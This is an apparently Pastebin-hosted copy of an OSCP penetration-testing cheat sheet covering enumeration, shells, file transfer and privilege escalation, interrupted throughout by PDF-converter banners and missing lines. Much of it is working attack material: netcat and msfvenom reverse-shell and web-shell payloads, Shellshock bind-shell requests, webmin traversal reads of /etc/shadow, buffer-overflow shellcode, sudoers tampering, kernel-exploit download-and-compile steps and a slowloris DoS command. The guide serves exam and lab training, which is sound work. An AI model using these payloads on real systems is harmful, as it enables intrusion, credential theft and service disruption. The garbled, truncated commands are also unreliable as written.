OSCP Survival Guide
OSCP Survival Guide
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
1. # OSCP-Survival-Guide
2. <pre>
3. _____ _____ _____ ______ _____ _ _ _____ _ _
7. \ \_/ /\__/ / \__/\| | /\__/ / |_| | | \ V /| |\ V / (_| | | | |_\ \ |_| | | (_| | __/
8. \___/\____/ \____/\_| \____/ \__,_|_| \_/ |_| \_/ \__,_|_| \____/\__,_|_|\__,_|\___|
9. </pre>
10. Kali Linux Offensive Security Certified Professional Playbook
11.
12. **NOTE: This document reffers to the target ip as the export variable $ip.**
13.
14. **To set this value on the command line use the following syntax:**
15.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
16. **export ip=192.168.1.100**
17.
18.
20. Thanks for all the Stars! Wrote my OSCP exam last night, did not pass sadly ... but I recorded a stop motion video of my failed
22. https://www.youtube.com/watch?v=HBMZWl9zcsc
23.
24. The good news is that I will be learning more and adding more content to this guide :D
25.
26.
33. * [Enumeration](#enumeration)
36. - [Shells](#shells)
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
43. * [Web Attacks](#web-attacks)
44. * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)
53. ========================================================================================================
54.
63.
64. - Find a search for a file that contains a specific string in it’s
65. name:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
71. - Change Password
72. `passwd`
73.
74. - Verify a service is running and listening
87.
88. - Unzip a gz file
89. `gunzip access.log.gz`
90.
91. - Unzip a tar.gz file
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
99.
102.
110.
111. `tail index.html`
112.
115.
118.
121.
122. - Use a bash loop to find the IP address behind each host
125. - Collect all the IP Addresses from a log file and sort by
126. frequency
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
127. `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`
128.
129. - Decoding using Kali
130.
132.
133. `echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode`
134.
137.
140. - Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems):
141. [https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/)
142.
143. - Connect to a POP3 mail server
145.
146. - Listen on TCP/UDP port
148.
149. - Connect to a netcat port
151.
154.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
155. - Receive a file using netcat
157.
158. - Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that...
159.
160. whereis nc
161. nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz
162.
164.
165.
169. or
170.
171. `nc.exe -nv <Remote IP> <Remote Port> -e cmd.exe`
172.
177.
178. `echo "" | nc -nv -w1 <IP Address> <Ports>`
179.
180. - Ncat - Netcat for Nmap project which provides more security avoid
181. IDS
182.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
183. - Reverse shell from windows using cmd.exe using ssl
184. `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`
185.
188.
189. - Wireshark
190. - Show only SMTP (port 25) and ICMP traffic:
191.
194. - Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
195.
198. - Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:
199.
200. `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`
201.
205.
206. Equals
207.
209.
210. ` ip.addr != xxx.xxx.xxx.xxx`
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
211.
212. Equals
213.
214. `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx`
215.
216. - Tcpdump
217.
220.
221. - Display ips and filter and sort
222. `tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head`
223.
224. - Grab a packet capture on port 80
225. `tcpdump tcp port 80 -w output.pcap -i eth0`
226.
227. - Check for ACK or PSH flag set in a TCP packet
228. `tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap`
229.
230. - IPTables
231.
235.
236. `iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP`
237.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
239.
245. iptables -F
246. iptables -X
247. iptables -t raw -F iptables -t raw -X
248.
249. Information Gathering & Vulnerability Scanning
250. ===================================================================================================================================
251.
252. - Passive Information Gathering
253. ---------------------------------------------------------------------------------------------------------------------------
254.
255. - Google Hacking
256.
262.
263. - Google inurl
264. `inurl:"level/15/sexec/-/show"`
265.
266. - Google Hacking Database:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
267. https://www.exploit-db.com/google-hacking-database/
268.
269. - SSL Certificate Testing
270. [https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html)
271.
272. - Email Harvesting
273.
274. - Simply Email
275. `git clone https://github.com/killswitch-GUI/SimplyEmail.git `
276.
277. `./SimplyEmail.py -all -e TARGET-DOMAIN`
278.
279. - Netcraft
280.
281. - Determine the operating system and tools used to build a site
282. https://searchdns.netcraft.com/
283.
290.
291. - `nc -v $ip 25`
292.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
295. - `nc TARGET-IP 80`
296.
297. - Recon-ng - full-featured web reconnaissance framework written in Python
298.
299. - `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git `
300.
303. `./recon-ng `
304.
305. `show modules `
306.
307. `help`
308.
318.
319. / | Addresses | Hosts | Netmask | Amount of a Class C
320. --- | --- | --- | --- | ---
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
323. /28 | 16 | 14 | 255.255.255.240 | 1/16
324. /27 | 32 | 30 | 255.255.255.224 | 1/8
340.
341. - Netcat port Scanning
342. `nc -nvv -w 1 -z $ip 3388-3390`
343.
344. - Discover active IPs usign ARP on the network:
345. `arp-scan $ip/24`
346.
347. - Discover who else is on the network
348. `netdiscover`
349.
350. - Discover IP Mac and Mac vendors from ARP
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
351. `netdiscover -r $ip/24`
352.
367.
368. - Enumeration Scan
369. `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`
370.
371. - Enumeration Scan All Ports TCP / UDP and output to a txt file
372. `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`
373.
374. - Nmap output to a file:
375. `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`
376.
377. - Quick Scan:
378. `nmap -T4 -F $ip/24`
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
379.
380. - Quick Scan Plus:
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
407. - Scan with Active connect in order to weed out any spoofed ports designed to troll you
411. -----------
412.
413. - DNS Enumeration
414.
415. - NMAP DNS Hostnames Lookup
416. `nmap -F --dns-server <dns server ip> <target ip range>`
417.
418. - Host Lookup
419. `host -t ns megacorpone.com`
420.
421. - Reverse Lookup Brute Force - find domains in the same range
422. `for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"`
423.
424. - Perform DNS IP Lookup
425. `dig a domain-name-here.com @nameserver`
426.
427. - Perform MX Record Lookup
428. `dig mx domain-name-here.com @nameserver`
429.
430. - Perform Zone Transfer with DIG
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
435.
436. `nslookup -> set type=any -> ls -d blah.com `
437.
455.
456. - Nmap port version detection MAXIMUM power
457. `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>`
458.
459.
460. - NFS (Network File System) Enumeration
461.
462. - Show Mountable NFS Shares
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
463. `nmap -sV --script=nfs-showmount $ip`
464.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
490. `nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1
$ip`
491.
492. - Nmap all SMB scripts authenticated scan
493.
494. `nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or
dos or external or fuzzer)' --script-args=unsafe=1 $ip`
495.
507.
508. - SMB Finger Printing
509. `smbclient -L //$ip`
510.
511. - Nmap Scan for Open SMB Shares
512. `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24`
513.
514. - Nmap scans for vulnerable SMB Servers
515. `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
516.
517. - Nmap List all SMB scripts installed
523.
524. OR
525.
526. `python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip`
527.
528.
535.
536. Linux: `smbclient -L //$ip`
537.
538.
539. - SMTP Enumeration - Mail Severs
540.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
544. - POP3 Enumeration - Reading other peoples mail - You may find usernames and passwords for email accounts, so here is how to check
556. 1 786
557. 2 1021
558.
559. retr 1
560.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
571.
583.
584. - `snmpenum -t $ip`
585.
586. - `onesixtyone -c names -i hosts`
587.
588. - SNMPv3 Enumeration
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
599. - MS SQL Server Enumeration
600.
601. - Nmap Information Gathering
602.
603. `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-
sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-
port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`
604.
605. - Webmin and miniserv/0.01 Enumeration - Port 10000
606.
607. Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
608.
609. `curl
http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01
610.
611. Test to see if webmin is running as root by grabbing /etc/shadow
612.
613. `curl
http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01
614.
615. - Linux OS Enumeration
616.
617. - List all SUID files
618. `find / -perm -4000 2>/dev/null`
619.
620. - Determine the current version of Linux
621. `cat /etc/issue`
622.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
623. - Determine more information about the environment
624. `uname -a`
625.
626. - List processes running
627. `ps -xaf`
628.
629. - List the allowed (and forbidden) commands for the invoking use
630. `sudo -l`
631.
632. - List iptables rules
633. `iptables --table nat --list
634. iptables -vL -t filter
646.
647. - hostname
648.
649. - net users
650.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
651. - ipconfig /all
652.
653. - route print
654.
655. - arp -A
656.
662.
663. - schtasks /query /fo LIST /v
664.
665. - tasklist /SVC
666.
667. - net start
668.
669. - DRIVERQUERY
670.
671. - reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
672.
673. - reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
674.
675. - dir /s *pass* == *cred* == *vnc* == *.config*
676.
677. - findstr /si password *.xml *.ini *.txt
678.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
679. - reg query HKLM /f password /t REG_SZ /s
680.
681. - reg query HKCU /f password /t REG_SZ /s
682.
683. - Vulnerability Scanning with Nmap
684.
685. - Nmap Exploit Scripts
686. [*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
687.
688. - Nmap search through vulnerability scripts
689. `cd /usr/share/nmap/scripts/
690. ls -l \*vuln\*`
691.
692. - Nmap search through Nmap Scripts for a specific keyword
693. `ls /usr/share/nmap/scripts/\* | grep ftp`
694.
695. - Scan for vulnerable exploits with nmap
702. [*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
703.
704. - NMap DOS Scanning
705. `nmap --script dos -Pn $ip
706. NMap Execute DOS Attack
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
707. nmap --max-parallelism 750 -Pn --script http-slowloris --script-args
708. http-slowloris.runforever=true`
709.
710. - Scan for coldfusion web vulnerabilities
711. `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`
712.
713. - Anonymous FTP dump with Nmap
714. `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
715.
716. - SMB Security mode scan with Nmap
717. `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
718.
719. - File Enumeration
720.
721. - Find UID 0 files root execution
722.
723. - `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null`
724.
725. - Get handy linux file system enumeration script (/var/tmp)
726. `wget https://highon.coffee/downloads/linux-local-enum.sh `
727. `chmod +x ./linux-local-enum.sh `
728. `./linux-local-enum.sh`
729.
730. - Find executable files updated in August
731. `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`
732.
733. - Find a specific file on linux
734. `find /. -name suid\*`
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
735.
736. - Find all the strings in a file
737. `strings <filename>`
738.
739. - Determine the type of a file
757.
758. - Nikto
759. `nikto -h $ip`
760.
761. - HTTP Enumeration with NMAP
762. `nmap --script=http-enum -p80 -n $ip/24`
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
763.
764. - Nmap Check the server methods
765. `nmap --script http-methods --script-args http-methods.url-path='/test' $ip`
766.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
791. --max-retries 0 -p $x server\_ip\_address; done
792.
793. - WordPress Scan - Wordpress security scanner
794.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
819. >
820. > steghide extract -sf picture.jpg
821. >
822. > steghide info picture.jpg
823. >
824. > apt-get install stegosuite
825.
826. - The OpenVAS Vulnerability Scanner
827.
840. - DEP and ASLR - Data Execution Prevention (DEP) and Address Space
841. Layout Randomization (ASLR)
842.
843.
844. - Nmap Fuzzers:
845.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
847. [https://nmap.org/nsedoc/categories/fuzzer.html](https://nmap.org/nsedoc/categories/fuzzer.html)
848.
849. - NMap HTTP Form Fuzzer
856.
857. - MSFvenom
858. [*https://www.offensive-security.com/metasploit-unleashed/msfvenom/*](https://www.offensive-security.com/metasploit-
unleashed/msfvenom/)
859.
860. - Windows Buffer Overflows
861.
862. - Controlling EIP
863.
864. locate pattern_create
865. pattern_create.rb -l 2700
866. locate pattern_offset
872.
873. - Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
874.
875. - Use Mona to determine a module that is unprotected
876.
877. - Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP
878.
879. - Use NASM to determine the HEX code for a JMP ESP instruction
880.
881. /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
882.
885.
886. - Run Mona in immunity log window to find (FFE4) XEF command
887.
891.
892. - MSFVenom to create payload
893.
894. msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
895.
896. - Final Payload with NOP slide
897.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
902. -f
908. -f
909. exe -e x86/shikata\_ga\_nai -i 9 -o
910. shell\_reverse\_msf\_encoded.exe
911.
913. executable
914. msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f
917. shell\_reverse\_msf\_encoded\_embedded.exe
918.
922.
923. - Linux Buffer Overflows
924.
927.
928. - ESP register points toward the end of our CBuffer
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
930. jmp eax
931. 83C00C add eax,byte +0xc
939.
940. - crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" +
941. "\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90"
942.
943. - msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b
949. Shells
950. ===================================================================================================================================
951.
952. - Netcat Shell Listener
953.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
958.
959. (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell )
960.
963. - You may encounter limited shells that use rbash and only allow you to execute a single command per session.
964. You can overcome this by executing an SSH shell to your localhost:
965.
980.
981. perl: `exec "/bin/sh";`
982.
983. ruby: `exec "/bin/sh"`
984.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
985. lua: `os.execute('/bin/sh')`
986.
989.
992.
993. `:set shell=/bin/bash:shell`
994.
1001. echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G
1 –z /tmp/.tst –Z root
1002.
1006. [http://pentestmonkey.net/tools/web-shells/php-reverse-shel](http://pentestmonkey.net/tools/web-shells/php-reverse-shell)
1007.
1010.
1011. - Perl Reverse Shell
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1012. [http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell)
1013.
1014. - PHP powered web browser Shell b374k with file upload etc.
1015. [https://github.com/b374k/b374k](https://github.com/b374k/b374k)
1016.
1017. - Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell
1018. https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
1019.
1022.
1024.
1025. *Linux*
1026.
1027. `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf`
1028.
1029. *Windows*
1030.
1031. `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe`
1032.
1033. *Mac*
1034.
1035. `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho`
1036.
1037. **Web Payloads**
1038.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1039. *PHP*
1040.
1041. `msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`
1042.
1043. OR
1044.
1045. `msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`
1046.
1047. Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage:
1048.
1049. `cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php`
1050.
1051. *ASP*
1052.
1053. `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp`
1054.
1055. *JSP*
1056.
1057. `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp`
1058.
1059. *WAR*
1060.
1061. `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war`
1062.
1065. *Python*
1066.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1067. `msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py`
1068.
1069. *Bash*
1070.
1071. `msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh`
1072.
1073. *Perl*
1074.
1075. `msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl`
1076.
1077. **Shellcode**
1078.
1079. For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able
1082.
1083. `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
1084.
1085. *Windows Based Shellcode*
1086.
1087. `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
1088.
1091. `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`
1092.
1093. **Handlers**
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1094. Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers
should be in the following format.
1095.
1102.
1103. Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
1104.
1110. - Shellshock
1111.
1115.
1116. - git clone https://github.com/nccgroup/shocker
1117.
1118. `./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose`
1119.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1121. Check for forced command by enabling all debug output with ssh
1122.
1123. ssh -vvv
1125.
1126. - cat file (view file contents)
1127.
1128. echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo
1129.
1130. - Shell Shock run bind shell
1131.
1132. echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e
1135. ============================================================================================================
1136.
1139.
1142. - Run a basic http server, great for serving up shells etc
1143. python -m SimpleHTTPServer 80
1144.
1145. - Run a basic Python3 http server, great for serving up shells
1146. etc
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1147. python3 -m http.server
1148.
1152.
1153. - Run a basic PHP http server
1155.
1156. - Creating a wget VB Script on Windows:
1157. [*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)
1158.
1159. - Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a
Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web
server (the timeout 1 commands are required after each new line):
1160.
1161. echo Set args = Wscript.Arguments >> webdl.vbs
1162. timeout 1
1163. echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs
1164. timeout 1
1172. timeout 1
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1173. echo with bStrm >> webdl.vbs
1174. timeout 1
1182. timeout 1
1183. echo end with >> webdl.vbs
1184. timeout 1
1185. echo
1186.
1198. http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php
1199.
1200. - Uploading Files
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1201. -------------------------------------------------------------------------------------------------------------
1202.
1203. - SCP
1204.
1205. scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
1206.
1207. scp localfile username@$ip:~/Folder/
1208.
1211.
1212. - Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
1213.
1214. `davtest -move -sendbd auto -url http://$ip`
1215.
1216. https://github.com/cldrn/davtest
1217.
1218. You can also upload a file using the PUT method with the curl command:
1219.
1221.
1222. And rename it to an executable file using the MOVE method with the curl command:
1223.
1224. `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`
1225.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1229. /tmp/evil" http://$ip/files/sh.php
1231. http://$ip/files/sh.php
1232. curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
1233.
1234. - TFTP
1240.
1241. - FTP
1243.
1244. \#!/bin/bash
1255.
1256. - Packing Files
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1257. -------------------------------------------------------------------------------------------------------------
1258.
1259. - Ultimate Packer for eXecutables
1262. - exe2bat - Converts EXE to a text file that can be copied and
1263. pasted
1272. cd setup
1273. setup.sh -c
1274.
1275. Privilege Escalation
1276. ==================================================================================================================
1277.
1278. *Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different
services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.*
1279.
1280.
1283.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1284. - Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration:
1285. [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-
escalation/)
1286.
1287. - Try the obvious - Maybe the user can sudo to root:
1288.
1290.
1291. - Here are the commands I have learned to use to perform linux enumeration and privledge escalation:
1292.
1293. What services are running as root?:
1294.
1295. `ps aux | grep root`
1296.
rename here.
1301. find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
1302. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
1303. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
1304. for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
1305. find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
1306.
1307. What folders are world writeable?:
1308.
1309. find / -writable -type d 2>/dev/null # world-writeable folders
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1310. find / -perm -222 -type d 2>/dev/null # world-writeable folders
1313. find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
1314.
1315. - There are a few scripts that can automate the linux enumeration process:
1316.
1317. - Google is my favorite Linux Kernel exploitation search tool. Many of these automated checkers are missing important kernel
exploits which can create a very frustrating blindspot during your OSCP course.
1318.
1321. [https://www.securitysift.com/download/linuxprivchecker.py](https://www.securitysift.com/download/linuxprivchecker.py)
1322.
1323. - LinEnum - (Recently Updated)
1324.
1325. [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)
1326.
1329. [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)
1330.
1334.
1335. - Linux Privilege Exploit Suggester (Old has not been updated in years)
1336.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1337. [https://github.com/PenturaLabs/Linux\_Exploit\_Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester)
1338.
1341. [https://github.com/reider-roque/linpostexp](https://github.com/reider-roque/linpostexp)
1342.
1343.
1346. - CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32)
1347.
1348. [https://www.exploit-db.com/exploits/14814/](https://www.exploit-db.com/exploits/14814/)
1349.
1350. wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814
1356.
1357. - CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
1358. [https://www.exploit-db.com/exploits/15285/](https://www.exploit-db.com/exploits/15285/)
1359.
1360. - CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
1361. [https://git.zx2c4.com/CVE-2012-0056/about/](https://git.zx2c4.com/CVE-2012-0056/about/)
1362. Linux CVE 2012-0056
1363.
1364. wget -O exploit.c http://www.exploit-db.com/download/18411
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1365. gcc -o mempodipper exploit.c
1366. ./mempodipper
1367.
1368. - CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
1369. [https://dirtycow.ninja/](https://dirtycow.ninja/)
1370. First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016
1371.
1372. - Run a command as a user other than root
1373.
1374. sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf
1375.
1376. - Add a user or change a password
1377.
1380.
1381. - Local Privilege Escalation Exploit in Linux
1382.
1385. superuser, you can update the UID / GID and shell as required.
1386.
1387. below are some quick copy and paste examples for various
1388. shells:
1389.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1393. setresuid(0, 0, 0);
1394. system("/bin/bash");
1395. }
1396.
1402. }
1403.
1409. - Create and compile an SUID from a limited shell (no file transfer)
1410.
1411. echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
1414. - Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement:
1415.
1416. `echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update`
1417.
1418. - You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable
1419. to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on
1420. port 4444.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1421.
1426. - SearchSploit
1427.
1428. searchsploit –uncsearchsploit apache 2.2
1432.
1433. - Kernel Exploit Suggestions for Kernel Version 3.0.0
1434.
1435. `./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0`
1436.
1437. - Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!***
1438.
1439. [*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/)
1440.
1444.
1445. - Find and display the proof.txt or flag.txt - LOOT!
1446.
